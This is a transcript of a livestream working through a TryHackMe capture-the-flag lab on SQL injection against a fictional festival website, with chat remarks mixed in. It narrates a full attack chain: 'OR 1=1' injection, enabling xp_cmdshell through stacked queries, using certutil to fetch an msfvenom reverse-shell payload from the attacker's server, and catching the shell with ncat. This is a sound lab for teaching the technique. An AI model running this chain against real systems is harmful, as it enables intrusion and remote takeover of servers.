Cool, right, day 10. So this one is Inject the Halls with EXEC Queries. So the Best Festival company started receiving many reports that their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year. After looking into the matter, Santa Security Operations Center, the SOC, has confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server as user credentials have been changed. With no other way to revert the changes, Elf Exploit McRed has been tasked with attempting to hack back into the server to regain access. After conducting some initial research, Elf Forensic McBlue has come across a forum post made on the popular black hat hacking internet forum Jingle Hacks. The post made earlier in this month explains that the poster is auctioning off several active vulnerabilities related to Best Festival Company systems. Hello Jingle Hacks forums. As the merger of the Best Festival Company approaches, I find myself in possession of knowledge that's as good as gold. I've decided to auction off these vulnerabilities to the highest bidder. The stakes are high and the potential rewards are even higher. If you've got the skills and resources to make use of this information, you're in for a serious payday. I won't reveal all the details here, but I can confirm that these vulnerabilities are both 0 days and known issues in the Best Festival Company hasn't addressed. The treasure includes potential entry points, data access, and even the possibility of exposing classified information. To bid, simply reply to the thread with your offer and I'll provide a secure channel for the winning bidder to transfer payment. Right, this forum post surely explains the havoc that's gone on over the past week. Armed with this knowledge, Elf Exploit McRed began testing the company's website from outside to find the vulnerable components that led to the server compromise. As a result of McRed's thorough investigation, the team now suspects a possible SQL injection vulnerability. So in today's task, you'll learn the understand and identify SQL injection vulnerabilities, exploit stacked queries to turn SQL injection into a remote code execution. We're going to help Elf McRed restore the Best Festival Company website and save its reputation. So today we need the attack box. We need to start the VM. I've started the VM, but I don't have the attack box, so let's start you. Cool, so that's good. Given that the attached VM requires several services to initialize, it's a good idea to click it before, or like right at the beginning of the task. It takes 5 minutes to deploy. We're going to use the attack box, so we don't need to worry about the VPN. You will receive further instructions on accessing the Best Festival Company after a brief refresher on SQL and SQL Injection. So, while the attack box is booting, let's read through. So, SQL, structured query language, is an essential for working with the relational databases and building dynamic websites. Even if you've never explicitly used SQL before, chances are you've frequently interacted with a database. Whether you're checking your bank account details online, browsing through products of an e-commerce website, or posting a status on social media, you're indirectly querying and altering databases. SQL is one of the most popular languages that make all of this possible. Relational databases are structured data collections organized into tables, each consisting of various rows and columns. Within these collections, tables are interconnected with predefined relationships, facilitating efficient data organization and retrieval. For example, an e-commerce relational website, a relational database might include tables for customers, orders, and products, with relationships defined to link the customer information to their respective orders through the use of identifiers. SQL provides a rigid way to query, insert, update, and delete the data stored in these tables, allowing you to retrieve and alter databases as needed. A website or application that relies on database must dynamically generate SQL queries and send them to the database engine to fetch or update necessary data. The syntax of SQL queries is based on English and consists of structured commands using keywords like select, from, where, and join. This express operations in natural language-like ways. We're going to leverage an example database table to represent the tracking and cataloging of Christmas tree ornaments. The table and the column structure might look something like this. So let's keep the table on screen. So in the example above, we've defined a database table ornaments, to store ornaments with various columns, provide characteristics or qualities related to each item. We can run various SQL queries against the table to retrieve, update, or delete specific data. For example, select star from table ornaments where material equals wood. Select statement returns all of the columns and ornaments where the material is specified as wood. This select statement will return all of the ornaments created by ELF with the ID 102. Unlike the first statement, this query only returns the ornament's ID, color, and category. So in this case, they're not. So they're limiting the columns that are being returned. Then finally, we've got insert into table ornaments, and we're actually adding a new ornament to the table created by the ELF with ID 105 with the specified values. Right, PHP is a popular general-purpose scripting language that plays a crucial role in web development. It enables developers to create dynamic and interactive websites using generative HTML content on the server and delivering it to the client's web browser. PHP's versatility and seamless integration with SQL databases makes it a powerful tool for building feature-rich, dynamic web applications. PHP is a server-side scripting language, meaning the code is executed on the web server before the final HTML is sent to the user's browser. Unlike client-side technologies like HTML, CSS, and JavaScript, PHP allows developers to perform various server-side tasks such as connecting to a wide range of databases, executing SQL queries, processing form data, and dynamically generating web content. The most common way for PHP to connect to SQL services is by using the PHP Data Objects extension or specific database server drivers like MySQLi, MySQL, SQL Server for Microsoft SQL Server. And this connection is typically established by providing parameters such as the host, username, password, and database name. After establishing a database connection, we can execute SQL queries through PHP, and that will dynamically generate HTML content based on the returned data to display information such as a user profile, product listing, or blog article. Returning to our example, if we want PHP script to fetch information regarding any green-coloured ornaments, we could introduce the following lines. So we define a query which does select everything from table ornaments where colour is green, and then the result of that gets stored in the result. So yeah. Right, you can think of the result variable as a container that holds the outcome of the SQL query, allowing you to iterate through the rows and access the data contained within the rows. Later in the script, you can use the result object to fetch and display data, making it a crucial part of the process when working with databases in PHP. Right. User input. While the ability to execute SQL queries in PHP allows us to interact with our database, the real power of database-driven web applications lies in making these queries dynamic. In our previous example, we hard-coded the query to fetch green ornaments. However, real-world applications often require users to interact with the data. For instance, let's imagine we want to provide users with the ability to search for ornaments of their choice. In this case, we need to create dynamic queries that can be adjusted based on user input. One common way to take in user-supplied data in web applications is through get parameters. These parameters are typically appended to the URL and can be accessed by PHP. They allow users to specify their search criteria or input, making a valuable tool for interactive web applications. We could create a simple search form in which an input field for users to specify the color of ornaments they want. Upon submitting the form, the website will make a GET request to the search result page, including the user search parameters within the URL. PHP can then access the user's input as a GET parameter and dynamically generate a query based on the input. So here's an example. So we'll retrieve the get parameter color, save it as a variable color, then we'll execute the SQL query with the user's supplied information, select everything from table ornaments where color equals color, like the one provided, and then we'll execute it on the MySQL connection with the query string, and then store the result. So now users can dynamically control the query being executed by the database simply by modifying the browser parameter. Right, this simple example shows how powerful PHP and SQL can be in creating rich dynamic websites. Can't speak today. Right, So how do we take SQL and user input and make them bad? So SQL injection. Taking user-supplied input gives us a powerful way to create dynamic content, but fails to secure this input correctly can expose critical vulnerability known as SQL injection. SQL injection is an attack technique that exploits how web applications handle their user input. Particularly in SQL queries, instead of providing a legitimate input, like the ornament color, the attacker injects a malicious SQL statement into the web application input field. The application's database server then executes the rogue SQL query. SQL injection vulnerabilities pose considerable risks to web applications, as they can lead to unauthorized access, data theft, data manipulation, or even a complete compromise of the web application and its underlying database through remote code execution. If an attacker can control which queries the database executes, they can control the database functions performed and the data returned. As such, the impact can be catastrophic, ranging from exposing sensitive user information to causing significant data breaches. SQL injection vulnerabilities continue to be highly pervasive despite numerous advancements to mitigate them. This type of vulnerability is featured prominently in the OWASP Top 10 list of critical web application security risks. It's number 3 as of 2 years ago. When the web application incorporates user input into SQL queries without proper validation and sanitization, this opens the door to SQL injection. For example, consider our previous PHP code for fetching user input to the search ornament colors. So we retrieve the color again, but because we can change this, if we supply, this is Tiberius's favorite. But yeah, by providing that as the input, it changes this command into that essentially, and then the // apostrophe becomes a comment. So that. Yeah, we can know what this is. So this we say get the color that equals blank, which it won't match anything, or get 1 equals 1, which will equal true. So it will say select everything from the table ornaments where true, which will return at all records. Alright, as a result, the SQL injection successfully manipulates the query and returns all rows from the table, regardless of the actual ornament color value. This is a classic example of SQL injection payload, where the attacker leverages the or 1 equals 1 condition to bypass any intended conditions or logic in the query to retrieve data they're not supposed to access. A caution around 1 or equals 1. Oh, nice. It's crucial to emphasize that the potential risks around using the or 1 equals 1 payload, while commonly used for illustration, injecting it without caution can lead to unintended havoc on the database. When injecting or 1 equals 1 into a query, the intention is typically to bypass authentication or to return all items in the table by making the condition always true. However, risks lie in that you might not be aware of the context and scope of the query that you're injecting into. Additionally, applications sometimes use values from an initial request in multiple SQL queries. SQL injection payloads that return all rows can lead to unintended consequences when injected into other types of statements, such as an update or delete, because it will delete everything. Right. Imagine injecting it into a query that updates a specific user's information. An or 1 equals 1 payload would make the condition true for every row, leading to a mass update, affecting all records or all users in the table. This lack of specificity in the payload makes it a risky choice for penetration testers who might inadvertently cause significant data loss or alterations. A safe, for example, would be a more targeted condition known as based on a known attribute identifying the record that you want to manipulate. For instance, Bob and 1 equals 1. This updates Bob's record, and then 1 equals 2 doesn't. This still demonstrates that SQL injection vulnerability without putting the entire table's records at risk. A practical example, check out the lesson learn room, which is one of Tiberius's rooms, which will then... it's good that they included that. I really like that. That was. I wonder if Tiberius had a hand in that. But fortunately, the development team behind the Best Festival Company has confirmed the website does not run any unpredicted queries and has permitted us to use the payload to demonstrate the vulnerability. So stacked queries. SQL injection attacks can come in various forms. A technique that often gives the attacker a lot of control is known as the stacked query. Stacked queries enable attackers to terminate the original executed query and execute an additional SQL statement in the single injection, potentially leading to more severe consequences as the data modification and calls to store procedures or functions. In SQL, the semicolon typically signifies one statement's conclusion and another's commencement. This feature facilitates the execution of multiple sequence statements within a single interaction within the database server. It's important to note that there are certain web application technologies and database management systems may demand different syntax or lack of support for stacked queries. Consequently, enumeration is essential for precision when conducting an injection attack. Suppose that the attacker in our previous example wants to go beyond just retrieving all the rows and intends to insert some malicious data into the database. They can modify the previous injection payload to this. So then they just slap an insert statement in there. So now when the web application processes the input, the resulting query in the database would execute select all from ornaments where colour is nothing, and then insert the additional row. As a result, the attacker successfully ends the original query with a semicolon and introduces a new statement that inserts malicious data. This showcases the potential impact of stacked queries, allowing attackers not only to manipulate the retrieved data, but also perform permanent data modification. So testing for SQL injection. Testing for SQL injection is a critical aspect of web application security assessments. It also involves the probing of the application to identify vulnerabilities where an attacker can manipulate user-supplied input to execute unauthorized SQL queries. To continue our mission, let's navigate to the defaced Best Festival Company website to see if we can identify vulnerable input that leads to SQL injection. If you haven't already, click the Start Machine button at the top right corner of the task and allow the machine 5 minutes to fully deploy. It's definitely been more than 5 minutes just reading all of this. So yeah, from here you can visit that in the web browser. So let's open a web browser. Ten dot 10.194.200. I not want the S. Let's 206. That might help as well. Might help if I put the right IP. There we go. Cool. Right, so we got there in the end.
Fix it says. The IPs are so much higher than usual lol.
Yeah, everyone else is jamming their AWS numbers up. I'd hate to know what they're spending on like Route 53 at the moment. Must be redonkulous. So we can see the Deface website. They've changed cheerful to mischievous. The most boring season of the year. A grumpy company. We are terrible greetings. Christmas has been cancelled. No! See if I move my massive head out of the way, people should be able to see the defacement. Right, so navigating the website as an end user to understand its functionality and offerings is a great place to start. This manual enumeration allows us to identify the areas of the application that user input is accepted and used in SQL queries. This can include search fields, login forms, and any input fields that interact with the database. You may need to navigate to the correct page containing the vulnerable component, so be sure to click any buttons or links that you find. Browse the website manually until you find a form that accepts user input and might be querying a database. After locating the GIF search feature, we can confirm our suspicion by simply filling out the form with expected values. So, GIF search. Start my GIF search. After clicking search, the website redirects us to the result page. So what are we going to give it? Child. I'm an adult. not bloody senior. I would like toys, crafts, and gadgets with all of the budget. Right, so we get redirected. So we can identify some interesting SQL query parameters looking at the URL in our browser. The underlying PHP code taking in 3 parameters, age, interest, and budget, separated by the ampersand character, querying the database to retrieve the filtered results and output them to the page. Now that we've identified an area of the website where the user input is accepted and used to generate dynamic SQL queries, we can test if it's vulnerable to any injection attack. To do this, we can alter the parameters to test how the application handles unexpected characters. To test the input fields, we can submit characters like single quotes, double quotes, as these are special characters that attackers use to manipulate SQL queries. We might be able to trigger error messages by introducing possible syntax errors into the query. This will also prove that the input is unsanitized as it reaches the back end. However, the GIF search feature doesn't offer any free-form text input for us to type and manipulate. We can look at modifying the URL parameters directly to test the application. To do this, alter the age parameter in the URL to give a single quote and hit enter. So we'll change adult to that. There we go, we got an error. So the error that we received is a huge breakthrough. It gives us many details on the underlying database management system powering the website and confirms that the input is unsanitized. This error message shows that they're running Microsoft SQL Server as the database manager due to the banners and the driver information that's displayed between the square brackets. The information that we gather here will soon be helpful. The error message enumeration is critical to SQL injection testing because it equips attackers with valuable information for crafting more precise and effective attack payloads. Because of this, it's essential to monitor and sanitize error messages to prevent sensitive information from leaking. Although we don't have access to the source code at this point, we can visualize the underlying PHP script might look like this. So it gets the 3 parameters, loads them up like that, and then just runs the query. So pretty similar to what we saw before, just with more than one input. As seen above, the script is likely extracting the values of the URL parameters in an unsanitized way, directly inserting into the query, SQL query to be executed. If we break out of the hard-coded query by injecting our own SQL syntax, we can manipulate the request and consequently the returned data. Let's attempt to leverage the SQL injection payload from earlier by injecting in our own condition to the GIF search feature that will always evaluate to true. So sorry Tiberius, we're gonna run or 1 equals 1. And the comment string. So we're told then we're going to get all of the GIFs. Nice. By injecting our payload and commenting out the rest of the query, we can bypass the intended filter and avoid errors. This retrieves all the GIF results, regardless of the specified parameter. We've successfully dumped the database table and returned all 636 rows of the page. It's a very simple example and suitable proof of concept that the website is vulnerable. However, it's unlikely that the attacker who defaced the Best Festival company did so by returning GIF results, so let's explore possible methods to execute system commands via our newly found attack vector. As mentioned, stack queries can be used to call stored procedures or functions within the database management system. You can think of a stored procedure as extended functions offered by certain database systems, serving various purposes such as enhancing performance and security, and encapsulating complex database logic.
They had to put that link in or they'd have been mauled. D.
Do you mean Tiberius's link? to his private room. Yeah.
Buy tips.
Alright, so calling a stored procedure, as mentioned, stack queries can be used to call the stored procedure or function within a database management system. You can think of the stored procedure as an extended function. I read that bit. Microsoft SQL Server stored procedure, or this is the command, xpcmd shell, is a specific command that allows for the executing of operating system calls. If we can exploit a stacked query to call the stored procedure, we might be able to run operating system commands and obtain remote code execution. As we previously confirmed, the database system in our example is SQL Server. With that in mind, let's dive deeper into XP Command Shell. So this is a system extended stored procedure in Microsoft SQL Server. It enables the execution of operating system commands and programs from within SQL Server. It provides a mechanism for SQL Server to interact directly with the host operating system as Command Shell. While it can be a powerful admin tool, it can also be a security risk if it's not used cautiously when it's been enabled. Because of the known risks involved, it's recommended that this functionality is disabled on a production server, and it is by default. However, due to misconfigurations and legacy applications, and when someone really wants to run commands from the fucking database, sometimes people enable it. I don't need help, thank you, Firefox. Right. For example, suppose that you have a HR management system and it needs to export data periodically to CSV file and upload it to an external server. Instead of using a more secure and modern method like SQL Server integration services or custom application code, legacy applications may have opted to rely on XP Command Shell to execute a system-level command to export the data. While this accomplishes the same task, it poses a host of security and maintainability risks, and grants excessive system access to the SQL Server. It's also possible to manually enable Command Shell in SQL Server through the EXEC query. Still, it requires the database user to be a member of the sysadmin fixed server role or have alter settings server level system permissions to execute the command. However, as mentioned previously, misconfigurations allow this execution are not uncommon. We can attempt to enable XP Command Shell on the Best Festival Company database by stacking the following commands. By injecting the above statements into the SQL Server, we'll first have enabled the advanced configuration option by setting Show Advanced Options to 1. Then we'll apply and change the running configuration by the reconfigure statement. And then we'll enable XP Command Shell procedure by setting XP Command Shell to 1 and applying the changes by again running the configuration. Converting these into a single stack SQLi payload will look like this. So let's grab that. We're going to run it. Does it want us to run it? By requesting the URL with these parameters, we should be able to execute the stack queries and enable the Command Shell procedure. With this feature enabled, we can execute any Windows shell command through the execute or exec statement followed by the command line. Unfortunately, one of the caveats of this approach is that it returns its results as a row of text. This means that typically the output will never be returned to the user since the injection no longer occurs in the original intended query. Because of this, we're often in the dark as to whether or not the injection worked, but there are other ways to validate whether or not it worked. So let's confirm if we have remote code execution by attempting to execute certutil on the target machine. This command is a native Windows command line program installed by part of Certificate Services. This is in the LOLBAS system if you look up that. So it's handy in engagements because of the binary signed by Microsoft and allows us to make HTTPS connections. In our scenario, we can use it to make HTTP requests, download a file from the web server that we control and confirm that the command was executed. To set this up, let's create a malicious payload using MSF Venom, allowing us to eventually upgrade our SQL injected shell into a more standard reverse shell. You can think of the reverse shell as the remote computer, the Best Festival Company's web server. It will initiate a connection back to our attack box that we're listening for. Once the connection is established, we can gain control over the remote system and interact with the target machine directly. This is the opposite of a typical remote access scenario, in which case the user and the client, the user is the client and the target is the server. MSF Venom is a command line payload generation tool. It's part of the Metasploit framework and is widely used penetration testing and ethical hacking set of utilities. MSF Venom is explicitly designed to generate payloads that can be used within a Windows executable. When that is executed, it will make the reverse shell connection back to the attack box, and we can run the following command on Kali or on the attack box. So let's do this. It's definitely a wordy box this time, but it's getting us to do more. So this is one of my complaints in the last set that we've had. So paste that in. Go away. Right. Right, delete this bit. If you want to find out your IP, do open new tab, ifconfig. And you want there it is. ENS. Oh, it's also there as well. Could have got it from that. Could have just looked at the IP. So 10.10.25.95. And it needs the M. So MSF Venom. Note that you must change the lhost argument to your target IP's box. Okay, gave you the grep there so you can get it directly. It's taking its sweet time. It will take a moment to generate, but once it's complete, you will have created a reverse.exe Windows executable that will establish the reverse TCP connection to your IP address over port 444 when executed. With our payload created, we can create a quick HTTP server on our attack box using Python. So Python 3-m http.server 8080. That's using 8000, but I'll use 8080. By running the above command, we'll set up a light web server on port 8000. We can use this to serve our payload all the files on our directory, including reverse exe. Alright, so this will be served using this method and will be accessible during the best festival server to download. So now it's time to use our stacked query to call XP command shell, execute cert-u2 on the command line to target our payload. So if we run this, and I will... Right, you've got to have this running, because this will be running the web server. I'm going to start a new one, because it's just easier. Actually, no, I'm talking about my mouse. We'll keep that for the netcat. We'll do that next. So go to the website. Delete the all 1 equals 1. Paste in, which I need to put in this clipboard thing. Go, and then I need to change my port to 8080. You can use whatever you set up. And then my IP was 10.10.25.95, I believe. Yeah. So I'm going to move this to the side so we can see, but when this runs, we should see a new entry on this box here. We should. No? Alright, well, maybe they have to do it on 8000. Maybe they've explicitly allowed that port. Let's run it again. Maybe I sent you all down the wrong path, so let's do that. 8000. Your search returned no results. Did it now? 10.10.25.95. Does that actually work? Yeah, so it is working. So why is that screwing up? So age equals that, exec xp command shell, cert util URL cache f, http, your IP, reverse exe, Windows temp reverse. That should totally work. Maybe it doesn't like all the rest of the stuff at the end. So just ten dot 10.25.95.8000. It's not making any requests. Oh, there's one. Just popped in. Not to. Oh, it didn't go to reverse though. So it works if I go directly. Why is it not working through? I'm calling bullshit on this one. So let's try it one more time. GIF search, start a search, search, copy this into the attack box. 10.10.25.95. No. Weird. Maybe it wants. Okay, yeah. Maybe it wants me to run this first because I skipped this one. So we need to run this one. Go away. We need to run this one in order to enable the functionality. So it's me skipping ahead that broke it. So do that. That enables it. And then we should be able to run that previous command. And then this will run the reverse shell. Got to put my IP in again. .10.10.25.95 bosh. No, it's still not working. Have they fucked it? Is it just not working? Or someone logged into my box and fixed it. Toy search. No gift result. .10.10.25.95. There we go. Right. Took a million times, but it finally did something. But that's what you want to look for. So run that one. Run this one to enable the payload, and then run this one to actually pull the MSF Venom thing off. And then, like, you'll see that when I ran it, when I made that request, you should see it go and fetch it. So you'll actually get the feedback that it worked. So now we've put our reverse payload onto the temp directory, and we should be continue. So great progress. We've achieved the remote code execution. We have our reverse payload on the target system. So now we can use another tool. So we can close this one. Do ncat listen on port 4444. And now that's going to listen for a connection back. So if we take this command, and then this will tell the server to run temp reverse exe, and we'll get a shell back. So after making the request to the URL, your netcat listener terminal window should then catch the shell that made the reverse connection back. With that, we have the reverse shell connection to the Best Festival web server that we were previously locked out of. Now it's time to use our newfound access to restore the defaced content. So now that we've gained interactive control over the web server, let's see if there are any clues that help us restore the site. Exploring the system users directory. Let's maximize this. So explore C users is a good place to start. This directory holds documentation and information for each user's profile on the system. It's worth mentioning that another legacy misconfiguration has worked in our favor. Providing the SQL Server service account were connected with admin level permissions of the system. This higher level of access may provide us with capabilities that we need to investigate and rectify the issue. Navigate to the users directory, see users, and explore the administrator folder. Here we'll search the subdirectories for hints and files that could guide us in restoring the website and saving the Best Festival company's reputation. So the conclusion, with the exploit McRed's determination cunning, the festival company's website is restored to its former glory. The joyful enchantment has woven back into the pages, and the access to the server was regained with your help. The team can now focus on completing the incident response process, ensuring Christmas preparations are back on schedule, and investigating who was behind the mysterious forum post. To protect your applications and data from SQL injection attacks, consider the following of these best coding practices. Input validation. Sanitize and validate all user-supplied input to ensure it adheres to expected data types and formats. Reject any input that doesn't meet validation criteria. Parameterize statements. Use prepared statements and parameterized queries in your database interactions. Parameterized queries automatically escape user input, making it difficult for attackers to inject malicious SQL. Store procedures. Use stored procedures to encapsulate your SQL logic whenever possible. This reduces the risk of SQL injection by separating user input from the SQL code. Right, so now, what are the task objectives? We manually navigate the defaced website, find the vulnerable search form. What is the web page that you come across? So, grab that from the open Firefox. So we want /gif results PHP. No, okay. Oh no, we don't want results. We want the actual thing. So let's go to the site. Go to the search, GIF search. So we want GIF search.php. GIF search. Analyze the SQL error message. What was returned? What ODBC driver can be used in the backend? So we want search apostrophe get the data error ODBC driver. Guess it wants that whole string. Let's copy that. Gosh, there we go. Inject 1 equals 1 into the GIF search form. What was the last result? So right to the bottom. There we go. Oh shit. It's going all the way up again. Copy you. Paste. Okay. What flag is in the note file that they've left behind on the system? So this will probably be in the directory searching. So cd. Let's go up to C. cd users. vir. cd administrator. Can you see what I'm typing? You can't, so let me bump it up a bit. What's that? That's better. Alright, so in admin, vir, let's look in desktop. That's where stuff usually gets put in these things. There you go, note. So type note.txt. Hey, Hacker0192, I received your Bitcoin payment. Thanks for the speedy transaction. After you gain access to the server, you can deface the website. Feel free to dump the database and steal whatever you want. If you need to revert the changes for any reason, just run restore website back from the same directory. Also, I shouldn't need to mention this, but please delete this note after defacing the website. Do not let this hack tie back to me. Tough shit. We got you. Right, so let's copy that. What is the flag that you receive on the home page after restoring the website? So we need to right, restore website.bat. So we need to do restore underscore website.bat. Restoring the website. Removing files and folders from the web root. Website restoration complete. Refresh the home page to see the changes and obtain your flag. So we need to go back on here. Let's go to the home page. Bosh, there we go. Great work, you managed to restore the Best Festival Company website. The gift search feature has been disabled until a fix is issued.
Acer says, GG's.
GG.
Translated from Indonesian.
Hacker Man. He's the most powerful hacker of all time.
That was quite good. I like this one. This was much more what I was after. I know I get the first couple of days are usually pretty slow, but then they ramp right up as we get into the first couple of weeks. So this is like really tickling the itch.
Good skills.
I fixed the thing that I messed up halfway through, so that was interesting. So yeah, really good. I really like that they're getting you to do a bit more than just learning a tiny bit of theory, getting you to run one command and then the task is over. Whereas now they're actually getting you to do things.
Yeah, much better today. Got any tips to add? Smile, smile.
No, not really. Just the thing that I messed up on was not realizing that I had to run. I mean, I knew I had to run this, but I made the assumption that they had already run this on my behalf because it didn't say you must run this. Whereas down here it was like, here's something you must do. Here's something you must do. So yeah, I'd assumed that this was already done.
I mean like other SQL tricks or something.
Not really. I think your best bet is probably going on to something like let's put that up. So go on to this site, because this will do more justice than I can think of. But yeah, lots more detections for the entry point, like possible ways of ending the original query. How to comment different ways. So they only taught us this method. So you can also do the /* and how to confirm logical operations. So again, they taught us that. They taught us a bit of and, but not really. And timing, so you can do blind timing tests and all sorts of stuff. So they go into like unions and ordering and like doing all the other like error-based detection, blind SQLi, time-based stacking. This we did kind of very handheld, but yeah, look at that site.
Fix it says. Thanks, smile, smile.
But that's it. It's 3 minutes past midnight, so I'm going to wrap up. Yeah, we can terminate the boxes. Terminate, and there's a tag box. There. Terminate. There we go. Let's not waste all the AWS spends that TryHackMe are doing. So yeah, I'll be back on tomorrow. Obviously, I will do day 11, but we'll probably do it closer to 4 o'clock rather than midnight on the Sunday.
I had not thought about stacked but done union before. Great with something new, finally, smile, smile.
Yeah, that's one. The thing the very first Advent of Cyber I did was last year's one, and I learnt so much stuff because it's fairly broad what it gets you to do. And I think some of the Zigbee stuff we were doing right around the smart device stuff, the stuff I've never touched before, so that was pretty nuts. And like with day 9 doing the DS spy DN spy stuff, never done that before.
Acer says, thanks for all the info, smile, smile.
No worries. Yeah, I just love learning new things, and I think it's great that something like this, although it's designed for beginners, gives you a taste of like all kinds of stuff that you've probably never seen before. So yeah, hats off to TryHackMe, because this stuff is really awesome, and the fact it's free is even better. So give it a go. I will see you tomorrow for day 11. Let's find someone to raid to.